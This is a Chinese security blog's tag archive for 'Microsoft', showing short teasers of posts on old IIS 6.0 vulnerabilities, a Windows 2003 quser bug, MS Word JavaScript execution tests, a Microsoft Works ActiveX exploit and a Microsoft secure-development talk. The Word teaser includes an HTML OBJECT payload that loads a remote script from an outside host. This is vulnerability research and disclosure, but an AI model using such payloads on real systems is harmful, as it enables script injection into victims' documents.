标签 ‘Microsoft’ 下的日志

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability

####
# #####
#### # #####
####### ### ######
####### ###### #######
######### ####### ########
##################### #########
#### ######### ########## ####
#### ###### ####### ####
#### #### #### ####
#### # #####
######## ###### ######
阅读全文 »

Tags: , , , ,

Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability

来源:80sec

function Copyright()
{

var Author=”80sec”;
var Email=”kEvin#80sec.com”.replace(”#”,”@”)
var Site=”http://www.80sec.com”;
var Date=new Date(2009,4,24).toLocaleString();
var Reference=”http://www.80sec.com/Microsoft-Internet-Infomation-Server-6-ISAPI-filename-analytic-Vulnerabilitie.html”;
return Reference;

}

/*

漏洞描述:
阅读全文 »

Tags: , , , ,

一个发现多年现在还未修补的bug

# 鬼仔:今天把theme从三栏改成了两栏,又修改了一些细节。两栏的文章阅读区域更大,不知道大家喜欢三栏还是两栏。

作者:zodiacsoft

从来就没有公开过未修补的bug,庆祝今天中午吃到一个很甜的砂糖桔,公开一个05年发现现在还没有修补的中文windows2003的bug。
典型问题出现在quser.exe。query user也是一样的。
阅读全文 »

Tags: ,

对MS word javascript execution的一些测试

作者:余弦
来源:0×37 Security

Microsoft word javascript execution原文:http://marc.info/?l=bugtraq&m=121121432823704&w=2,hi群内讨论过。可以得出一些结论:

1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能,使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code:

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js&gt;&lt;/script&gt;')"></OBJECT>

这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。
阅读全文 »

Tags: , ,

Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit

<!–
The problem is in wkimgsrv.dll module shipped with many MS Offiice
Suite (tested on MS OF 2003,MS OF 2007)
Actually,this is not the case of buffer overflow attack,just a exploit
of insecure method WKsPictureInterface.
Setting this point to any where in memory and IE will crash when
wkiimgsrv’s trying to access an invalid memory location.
阅读全文 »

Tags: , , ,

微软禇诚云:软件安全漏洞与软件开发

来源:腾讯

腾讯科技讯 3月19日消息,在为期两日的网讯网络安全技术峰会上,微软安全响应中心的禇诚云分享了他在软件安全漏洞与软件开发上的研究成果。

以下为褚诚云讲演实录:

褚诚云:大家好!我叫褚诚云,来自微软公司。我这个讲座可能跟其他人的讲座都有一点不一样,我是从产品开发的角度和大家分析安全漏洞。我希望利用这个机会可以和大家分享一些在软件开发过程中如何避免安全漏洞的经验。我先自我简单介绍一下,SWI称为Secure Windows Initiative,我们这个组处理微软产品的安全问题。我们这个组严格意义上隶属于MSRC的一部分。 ChrisW是我们一个资深的架构师。

现在我们转到正题。很多人说微软是不是真正了解安全,为什么这么说呢?微软的安全漏洞问题层出不穷。如果真正懂得安全,为什么产品还有这么多安全漏洞呢?
阅读全文 »

Tags: ,

开机画面:从Win 1.01到Vista

贴图不说话

Tags: ,